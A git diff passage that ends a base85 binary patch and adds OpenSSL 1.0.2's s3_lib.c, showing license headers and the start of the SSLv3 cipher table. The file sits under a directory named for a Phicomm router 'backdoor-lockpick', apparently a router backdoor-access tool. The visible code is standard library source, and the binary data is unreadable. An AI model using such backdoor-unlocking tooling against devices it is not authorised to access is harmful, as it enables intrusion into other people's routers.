zf<9&~D36&7Du!uy5VLMH%!WXzXfZG)OEYI&VROIlZzF+;(d=8P+MdmUiCXF!^Jv)G
z;EB06R6L-Yr^BZ|kC-PeJ*+1V-VG(Xc_`*Obn>SVT@iMz@Z=BG_BNE~M`l7o`s<6b
zL%ywBNm=4~!#s?*IsGvln@+{76|ihWdBi-TI+Go^<6FA*G&xh46nYjNNuAFj>=8th
z`3y<F)VA*;J+rSOV!msbUto+!y*&&;S~&Au9z*q%7*RoYe3U{YL6u@NeFH?4TCptj
zem&CL(n7N8p$6T$K1j(|rt8f9Qa$r|Rr*+gO0Wy-6f`Ip$%>V$Zr&@DVV@@?-_-*Y
zIhz&?Ce@ylx-tc8_v=EU6#J;)l0Lu!PWJYnLz2v_kR<tSxlk%xAhwzfG4nIgvCMnr
zs>h@1r=HUM=_&AIIXOpg>4{@8gtpLVjq$)#-8?3C7SbwO*_At<Q!<Lz7c3W<_kwJF
zK{gBx2noAaA@}a7qHb7r57}<?3EEHgBjr*b?QxLPbqCdu63v%GLnj~AvFxB@vQ7Ba
zHZMDH=PWzz8=&vM7!Q$FqoKD1!SFH2j+y&H?;BXY;PJPSJmqpu`(I0_e%;7j@jkv}
zhRk{bQdeq)j*VTZmRf9BJOUspG_=t4Tvf11`0yq~k#w6h71_`*-_&gv7n(<W3K{eS
zNw1#YKYU9*pO@n7fTmHKDWhnN)WIIH6CplYcFxL8nSH^C$tOa1#UgW%P9ra2KVUu|
z7U5EFp2Vr77gENI+s4AC0D&s>q$dwX0v<AR#3$^)TKoRUx;#Lr_himY*bt3b_Xm1F
zp<6$Y)9Jq`@L#p<mN7l=X!?+fIwT~Ibb@ZpIIL%1P5bSEjL<+{paxP12n`H-0O+|^
z8bW(n6l=1ou)W_Xq>@Q?U}JwD1>ggx|K!{CjJcQ6s5h4Qtzn*0)G_Oq0lAPGiIWBt
zRgYQMXvwwXR&mgt$U~cFwFj1OwRj4{nb<E8NB$Ti?M*x3Ne9|}wkR;MF&<}o*^B-a
zrM?(4^0T3#;V(YV=S7x4033{&zcG(c6yW&q2?fF*`e|szI;ES4^%F0EoYv)146`RR
zFftQ|kcc^qFcur+MXry`y(fMOBBbx*IGG^ruClkaA}jPwg19d{lhWtt`Gb1qOg{aI
z%oe)&r!aJjJt_2xL-9cn>(;IwyjT=&4fFxP(QPP&6YoPSG4@6--DFsMJ|g<e{*@!=
zqe5#5n*DZj1@JP%%tvsdnjwxw(swcr4rC7Iv!{H$(~*yi#0MfGLPK;;m=QbuN5gCl
zRQYy&WYu}F>#4BZbhyG-*~NKiG2MFNfNpvM(d@In?DM1-e8@;o(CRJpTs%qh!L&0a
zzU<F|!4Ls&MUtV-C~b<X48%+uqRznSrphp1HV^COk&`<O*J0f%3lsuu5Yws@u$j-5
zK}Q<N@gP!iS(`N{7b~slrLTpaT<1BNfyuqCbE$$eRj=U@UshekcU()2T-kXBt-i;?
z%OS4nrreAm-hpRMl<Ka%^|os=`~1V2@E+pbkO7RiQ=hicuvf*nHBDKmpxvd^Ir9Tm
zx7>72xExine)UEImkV9+>uxw6enAHQ(D$o-;a*PwU>FoGo1z{Gp}Rr}66Zu!`D!*v
zvq_PVj5p2JE1=uf6rpdNWz|tw&0%sB9pNbY#+hRW0T<1&@QP?CFEgu=yAlMN%&vOk
z6{Ock0NCerq?91^jEV9eqg5`GloxNoP>A$_jc=)LJx;+c431gpGf2ysXY<&heexK@
z=%<h9xo_Dah6Q^}CbO4yw)fvRD(9@WovMvab^!`dTuI=T;E-XyWMC#?JR0O7V2p_{
zk4zKhjWvMwn&tQfgq)WIg@M^pL3?{j-w-Z9L6f7a7EO0G1WLoMmt*tx`?4QnyALv3
zG~7a7I%|#FvhNYVXYao;$us%x4O7g#Zj1Kyd#d-64qjG&#lm^%`<ky<+O+OD@nn0V
zGNFaF+FGryuC7?**gEzCcA2a`^3$eGlixE7Sn$%zF2CZ+%BwC527?MLeB_I<<scbt
zRrJ89bdNQ_p|+r|?mB;P*{$jJRN6nUa!zH{m7#0Xq8hqmc2#B7+)HiP=BK5l96uW5
z1>anzAp;B$Mms(#bf}}^x^1cE+F0(IUN)(82WEi|Y=&sjw2O#gzPJ3|l3H)YJ?^O2
zpYzmugWD&By;a*LhP~C9NejF?O5Az3w;E8`8?5#EL0aoAul1H{S_RmfrK~u;qu%mN
zNy)dVjr44lZD}%UR1buVqvzog_fqJIjHBlku+wTlh59hAEHG}H7$KV@-X-o@*JN+?
zO=ro9p1Wjx6<QEt=aOucHhL`gmTxPm^HyZs5wE|*@K%Jq<za7Wc<%u%fM&`lR5sEB
z{oYm*R<vss?e%Etm2~Tg4nEjk67g1SbJuzO84pZeJ=yCABV@y)(R07YYPJs#O8&>_
z{bfG9#cjD9`bXn2jg|?NPe>L9@!pbXVcerM?!t#+++*GWm-`@ujW_NTcehAc^i5?h
zekqBqApo}CQ*x8HBInk<{_UQaH<*F^noZtdm<JK@|4i~xJW*MV-+;tkqPOU`PPUH5
z&Zw;mygeoE2A8)NL$CuQ_2ZIy@53cALaWB@0r|o&C(3;VzmEC>wsK$G<UQ_kuX1oK
z&9hc1>o4&AWrfsvw2x`)b5?QFj$xeQF3jq&jc!O9uee247~3)#)e^|RSNxqp#sIJj
z@N+?a4c=6$?3b7igsY<PIRIQ5?L_UO#_UE^UD`wiYpKE)<)l%Z!N5o5jK#^?vx{3h
z_iPY|Ta%q)tu)4Vc4Qzv7m4Zw%9m#qw?=mYW6M%hr=n-7h@6SaI{Z}Zt2TOXalp4b
z;14?Bk2&Cb9PpPM@HZXsGY<F^balLb(XnwnobCn2!>@I~bq9Qv1K#F<-|m3Z`Y@h7
z|KNb{0#4(r##O9i@XY}S`XNcbMNU1jwt@Z~2l`JPa32D2JUc6ZlRc;8)DY_(<j-=T
zzt#c&h6BFL0jGREo;~dj_%`5V=QcTI#F_~^f8s#DOVXc|^kUs4KReLB;DEp4fWP5@
zzYCn~TqjeCScjqaQwMqvQXbL2A?d}s3;GLzkLRCi2YjIeezODK;(%`kPWEi^!Uz;)
z!+jFJPvT<DMf<->{ItYXe%>o_pHGO<#JY;l-vC!K?H2p_dk5TuxF3&xI&iY{f6lY{
z#kz{mYbCz^&uqM~Mi#d1-QBHo;?0fiP2J6n>yq)d#)KxI&c>#AX!LWo*4@~estnD&
zdfqi!UHyuNI=%9m*;=JhS49s=nSh|R$#|lrvpLxn?@l$Ql3IL$vA8yD#23$>UmtCV
zH-u}AXk1&|nQX7GHzF-bt#0YJmozMf=GNAZgce=CBwiO=qDPm;>l#+ZTiRPvWJSCy
z+1c8dNW#?a=3=5mYqGID-6`Njk$88@ZAnhDF1ab*nrvU28pGJKo`Ya3s3Q~FnywZi
zA}wo^-KiL?h$lBPWLakub&g1FlKCy|jjf8NPB=huEnX7+Ci)r|W_H_5QeVOHrAy<T
zY3S(c>gdwq<hsPVc%pe-d`)9Zt33>oHcs8S6|P#RJh!GRnY2l|lc{tkBOu4g!C0Gw
z^z{WFQD;FNU(?#Swp(-q<1a@M=Q)9}VX%d0ZOOK_j`d@lD=c9y7d;p3vWsm^()?Q!
z7(`-^Bet4a+Sl4RSs!l_ZjQIMbf-9P6MWy*vB@T+P>8R=v%5LjBm%WIwm2?2PaoZJ
zSf|lfdvb$#CsJL~bv9RlXG2#D#!iH}RGer`kkGDVqNA&+o0{U}u+e#8(-j&TTi13#
zNORk4Zf>G0se%HXPi^WPJJubYn<zkp-bAu16<?q1YFV>sbk4y{#1J!9klIFJw7#3h
z$Ry)wJM`M)qLn6W(VVfz)K(*$PMuON?oM}hc66nZY*eHVY(2JlYm@ECF7ySqb*E@5
zC($=C5$D7kTgmoBM^n;1D^O-ZIv08AGkN%Kw$qKkDJ3afty8po(?9r8_<auaKax1n
zpU>!Ne@2Dyui>ZU{F*=%!YTJEyaf9IDr6_OXOhH=<zL8fE<en0F29}OUxyB*cPqmw
z_bU8f7(SihZ!w(i2^9UqWH<`hNoNLyA7=PWhX0P?7czW=;eLisz<NW4<ooec^1tSQ
z2N*t!(bIZNh2(I1ZelpMXEnq9;8A+p9q{iloa_BJhF`?wJjw9CWcVQme2C!zM*j)J
zFJ^cdbrgkOm*A)Dk20L=UCHnuqko;@moa>nxJ9((^Z2=%;XHoA4CnDv&+xxu@)HuL
zu;BBenbGrkXEFR@Cg;}-=ka-z;g>V|;|%BYm&>Cnxr58s8GZ$mvy9<9u96J*Gy2UA
z_}@9;|KWf?$8a8pM;OlI|22klJO9XVZs#O<{vbba+|O{Xx7Gn)!*Cvl?F<hv|Ezbw
zf5-4k7=3LiDkx-UC4MUYyBK~I!?!cMis3$aE+IJ~hF{3=*$kiUfM3UOK3|?>IQ^SZ
zW#>_b^Z9t5Jb#cq*E0Ic7*2O?O3qabuV(m-44=pF{S5are3HCkA-!Dwg%U5GrvXOK
z=V=qeuVeDF4CnLfpBPSeNvdB@F#H<~KgRGHhJVIz9_Q2L6%qBz&*+yjocnnb!+E?N
zWB3hB&g3bmppbkXCsP?7Mw{x_LWXlc#2L=>QY*tRXL2?$yq4j2GMw9U7sGjc{+!`{
zCg*tv{AGz#JkZiacimK8ccA}};XH4gW;nOgBhRnoPd<(_816@#^5-QISN15p(t-X4
z2YeyJxt;Y44=}y!7|!G5E_u!_j)!|0&i(%(!xu356Xju><me2qmbmJ#^8Y_G`WU0{
zV>pkiy$t8^^CH9jOwMZ(FV_3E1N|un+)Il+3iZp6pBk?!2mBijxWRBfUMm>R`?Z$g
zTyK}eRlk%yw>i+??SMbXaBk0|4CnFl3x-FTA6{TMkE=5hCp#$>DLX5tqJl#H<m0=L
z;d~yoFx(FwC1-;J{zC_Rmjix;;oJ}JGMw9UhT+_vGI?)Q94E6F&gEYrapfQS`wW#R
zqv!s=nc>{ecQHA%q$vM1vGsZm!`HI)l&^OWF`VY8l7mlCTzF2vPcB=U+@5F(m+7%^
z=caHutu()oVxKFi&#JV_55nlD?zel3aCMLU-$l5(f37BlC`yjH?`<l=)xGZaB3#|O
zK39aR`&GK{=JM6wr|AEca9rJgZY;vp{paIFxVrz`SA?tkPj!BzX8Ngn%T9UDQn<Re
z)GE6-wWS(w#XHqyznj%pSF*LSGL_tz(kgK$*QizA+TE>Hc6CsN$U~JORmGc#MGL+_
zREdkU##XH|(b3kHY=?;Uj#RP|f6~8FT*1lu+V*s1XIDojE<QF%8Odf`JvFu^g`580
z4?iT(5KSzSR3qy<<a|)gayV60qcb4Q(V7Bce=MQNhSDe3NqP~ligR^8O>>WM>3)3K
z<+#+_sQ~%*7uByoon#jCFHs4gh`!kV5ZVcwT|}q&i^V8@^{$cp6gRx|NX8Tg@$E0F
zFG8JU727W^semg#DK<6#Rb9u&c>XV?B!xolRLK8ylq&ZBEx<^B6@I)_&?OlP?Kyc-
z{Z{W5G^%e-S10*7M&HG>n}CsB#s1SJzaMS9DEk$5A3jKCF@Lk<?<sO@G5>b(j_1E6
z(tpj;VDcZWyNX|p%Xqp$rk#)k>fB7*JPPSzep*(FOauZtzj$d2$T(Jt{YTq^@%a1Z
O+Dw1Xc<Hm4|Nj7NPpy9d

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_lib.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_lib.c
new file mode 100644
index 0000000..28129f6
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/ssl/s3_lib.c
@@ -0,0 +1,4493 @@
+/* ssl/s3_lib.c */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+/* ====================================================================
+ * Copyright (c) 1998-2007 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* ====================================================================
+ * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
+ *
+ * Portions of the attached software ("Contribution") are developed by
+ * SUN MICROSYSTEMS, INC., and are contributed to the OpenSSL project.
+ *
+ * The Contribution is licensed pursuant to the OpenSSL open source
+ * license provided above.
+ *
+ * ECC cipher suite support in OpenSSL originally written by
+ * Vipul Gupta and Sumit Gupta of Sun Microsystems Laboratories.
+ *
+ */
+/* ====================================================================
+ * Copyright 2005 Nokia. All rights reserved.
+ *
+ * The portions of the attached software ("Contribution") is developed by
+ * Nokia Corporation and is licensed pursuant to the OpenSSL open source
+ * license.
+ *
+ * The Contribution, originally written by Mika Kousa and Pasi Eronen of
+ * Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
+ * support (see RFC 4279) to OpenSSL.
+ *
+ * No patent licenses or other rights except those expressly stated in
+ * the OpenSSL open source license shall be deemed granted or received
+ * expressly, by implication, estoppel, or otherwise.
+ *
+ * No assurances are provided by Nokia that the Contribution does not
+ * infringe the patent or other intellectual property rights of any third
+ * party or that the license provides you with all the necessary rights
+ * to make use of the Contribution.
+ *
+ * THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
+ * ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
+ * SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
+ * OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
+ * OTHERWISE.
+ */
+
+#include <stdio.h>
+#include <openssl/objects.h>
+#include "ssl_locl.h"
+#include "kssl_lcl.h"
+#include <openssl/md5.h>
+#ifndef OPENSSL_NO_DH
+# include <openssl/dh.h>
+#endif
+
+const char ssl3_version_str[] = "SSLv3" OPENSSL_VERSION_PTEXT;
+
+#define SSL3_NUM_CIPHERS        (sizeof(ssl3_ciphers)/sizeof(SSL_CIPHER))
+
+/* list of available SSLv3 ciphers (sorted by id) */
+OPENSSL_GLOBAL SSL_CIPHER ssl3_ciphers[] = {
+
+/* The RSA ciphers */
+/* Cipher 01 */
+    {
+     1,
+     SSL3_TXT_RSA_NULL_MD5,
+     SSL3_CK_RSA_NULL_MD5,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_eNULL,
+     SSL_MD5,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_STRONG_NONE,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     0,
+     0,
+     },
+
+/* Cipher 02 */
+    {
+     1,
+     SSL3_TXT_RSA_NULL_SHA,
+     SSL3_CK_RSA_NULL_SHA,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_eNULL,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_STRONG_NONE | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     0,
+     0,
+     },
+
+/* Cipher 03 */
+    {
+     1,
+     SSL3_TXT_RSA_RC4_40_MD5,
+     SSL3_CK_RSA_RC4_40_MD5,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_RC4,
+     SSL_MD5,
+     SSL_SSLV3,
+     SSL_EXPORT | SSL_EXP40,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     40,
+     128,
+     },
+
+/* Cipher 04 */
+    {
+     1,
+     SSL3_TXT_RSA_RC4_128_MD5,
+     SSL3_CK_RSA_RC4_128_MD5,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_RC4,
+     SSL_MD5,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_MEDIUM,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+/* Cipher 05 */
+    {
+     1,
+     SSL3_TXT_RSA_RC4_128_SHA,
+     SSL3_CK_RSA_RC4_128_SHA,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_RC4,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_MEDIUM,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+/* Cipher 06 */
+    {
+     1,
+     SSL3_TXT_RSA_RC2_40_MD5,
+     SSL3_CK_RSA_RC2_40_MD5,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_RC2,
+     SSL_MD5,
+     SSL_SSLV3,
+     SSL_EXPORT | SSL_EXP40,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     40,
+     128,
+     },
+
+/* Cipher 07 */
+#ifndef OPENSSL_NO_IDEA
+    {
+     1,
+     SSL3_TXT_RSA_IDEA_128_SHA,
+     SSL3_CK_RSA_IDEA_128_SHA,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_IDEA,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_MEDIUM,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+#endif
+
+/* Cipher 08 */
+    {
+     1,
+     SSL3_TXT_RSA_DES_40_CBC_SHA,
+     SSL3_CK_RSA_DES_40_CBC_SHA,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_DES,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_EXPORT | SSL_EXP40,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     40,
+     56,
+     },
+
+/* Cipher 09 */
+    {
+     1,
+     SSL3_TXT_RSA_DES_64_CBC_SHA,
+     SSL3_CK_RSA_DES_64_CBC_SHA,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_DES,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_LOW,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     56,
+     56,
+     },
+
+/* Cipher 0A */
+    {
+     1,
+     SSL3_TXT_RSA_DES_192_CBC3_SHA,
+     SSL3_CK_RSA_DES_192_CBC3_SHA,
+     SSL_kRSA,
+     SSL_aRSA,
+     SSL_3DES,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     112,
+     168,
+     },
+
+/* The DH ciphers */
+/* Cipher 0B */
+    {
+     1,
+     SSL3_TXT_DH_DSS_DES_40_CBC_SHA,
+     SSL3_CK_DH_DSS_DES_40_CBC_SHA,
+     SSL_kDHd,
+     SSL_aDH,
+     SSL_DES,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_EXPORT | SSL_EXP40,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     40,
+     56,
+     },
+
+/* Cipher 0C */
+    {
+     1,
+     SSL3_TXT_DH_DSS_DES_64_CBC_SHA,
+     SSL3_CK_DH_DSS_DES_64_CBC_SHA,
+     SSL_kDHd,
+     SSL_aDH,
+     SSL_DES,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_LOW,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     56,
+     56,
+     },
+
+/* Cipher 0D */
+    {
+     1,
+     SSL3_TXT_DH_DSS_DES_192_CBC3_SHA,
+     SSL3_CK_DH_DSS_DES_192_CBC3_SHA,
+     SSL_kDHd,
+     SSL_aDH,
+     SSL_3DES,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     112,
+     168,
+     },
+
+/* Cipher 0E */
+    {
+     1,
+     SSL3_TXT_DH_RSA_DES_40_CBC_SHA,
+     SSL3_CK_DH_RSA_DES_40_CBC_SHA,
+     SSL_kDHr,
+     SSL_aDH,
+     SSL_DES,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_EXPORT | SSL_EXP40,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     40,
+     56,
+     },
+
+/* Cipher 0F */
+    {
+     1,
+     SSL3_TXT_DH_RSA_DES_64_CBC_SHA,
+     SSL3_CK_DH_RSA_DES_64_CBC_SHA,
+     SSL_kDHr,
+     SSL_aDH,
+     SSL_DES,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_LOW,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     56,
+     56,
+     },
+
+/* Cipher 10 */
+    {
+     1,
+     SSL3_TXT_DH_RSA_DES_192_CBC3_SHA,
+     SSL3_CK_DH_RSA_DES_192_CBC3_SHA,
+     SSL_kDHr,
+     SSL_aDH,
+     SSL_3DES,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     112,
+     168,
+     },
+
+/* The Ephemeral DH ciphers */
+/* Cipher 11 */
+    {
+     1,
+     SSL3_TXT_EDH_DSS_DES_40_CBC_SHA,
+     SSL3_CK_EDH_DSS_DES_40_CBC_SHA,
+     SSL_kEDH,
+     SSL_aDSS,
+     SSL_DES,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_EXPORT | SSL_EXP40,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     40,
+     56,
+     },
+
+/* Cipher 12 */
+    {
+     1,
+     SSL3_TXT_EDH_DSS_DES_64_CBC_SHA,
+     SSL3_CK_EDH_DSS_DES_64_CBC_SHA,
+     SSL_kEDH,
+     SSL_aDSS,
+     SSL_DES,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_LOW,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     56,
+     56,
+     },
+
+/* Cipher 13 */
+    {
+     1,
+     SSL3_TXT_EDH_DSS_DES_192_CBC3_SHA,
+     SSL3_CK_EDH_DSS_DES_192_CBC3_SHA,
+     SSL_kEDH,
+     SSL_aDSS,
+     SSL_3DES,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     112,
+     168,
+     },
+
+/* Cipher 14 */
+    {
+     1,
+     SSL3_TXT_EDH_RSA_DES_40_CBC_SHA,
+     SSL3_CK_EDH_RSA_DES_40_CBC_SHA,
+     SSL_kEDH,
+     SSL_aRSA,
+     SSL_DES,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_EXPORT | SSL_EXP40,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     40,
+     56,
+     },
+
+/* Cipher 15 */
+    {
+     1,
+     SSL3_TXT_EDH_RSA_DES_64_CBC_SHA,
+     SSL3_CK_EDH_RSA_DES_64_CBC_SHA,
+     SSL_kEDH,
+     SSL_aRSA,
+     SSL_DES,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_LOW,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     56,
+     56,
+     },
+
+/* Cipher 16 */
+    {
+     1,
+     SSL3_TXT_EDH_RSA_DES_192_CBC3_SHA,
+     SSL3_CK_EDH_RSA_DES_192_CBC3_SHA,
+     SSL_kEDH,
+     SSL_aRSA,
+     SSL_3DES,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_HIGH | SSL_FIPS,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     112,
+     168,
+     },
+
+/* Cipher 17 */
+    {
+     1,
+     SSL3_TXT_ADH_RC4_40_MD5,
+     SSL3_CK_ADH_RC4_40_MD5,
+     SSL_kEDH,
+     SSL_aNULL,
+     SSL_RC4,
+     SSL_MD5,
+     SSL_SSLV3,
+     SSL_EXPORT | SSL_EXP40,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     40,
+     128,
+     },
+
+/* Cipher 18 */
+    {
+     1,
+     SSL3_TXT_ADH_RC4_128_MD5,
+     SSL3_CK_ADH_RC4_128_MD5,
+     SSL_kEDH,
+     SSL_aNULL,
+     SSL_RC4,
+     SSL_MD5,
+     SSL_SSLV3,
+     SSL_NOT_EXP | SSL_MEDIUM,
+     SSL_HANDSHAKE_MAC_DEFAULT | TLS1_PRF,
+     128,
+     128,
+     },
+
+/* Cipher 19 */
+    {
+     1,
+     SSL3_TXT_ADH_DES_40_CBC_SHA,
+     SSL3_CK_ADH_DES_40_CBC_SHA,
+     SSL_kEDH,
+     SSL_aNULL,
+     SSL_DES,
+     SSL_SHA1,
+     SSL_SSLV3,
+     SSL_EXPORT | SSL_EXP40,
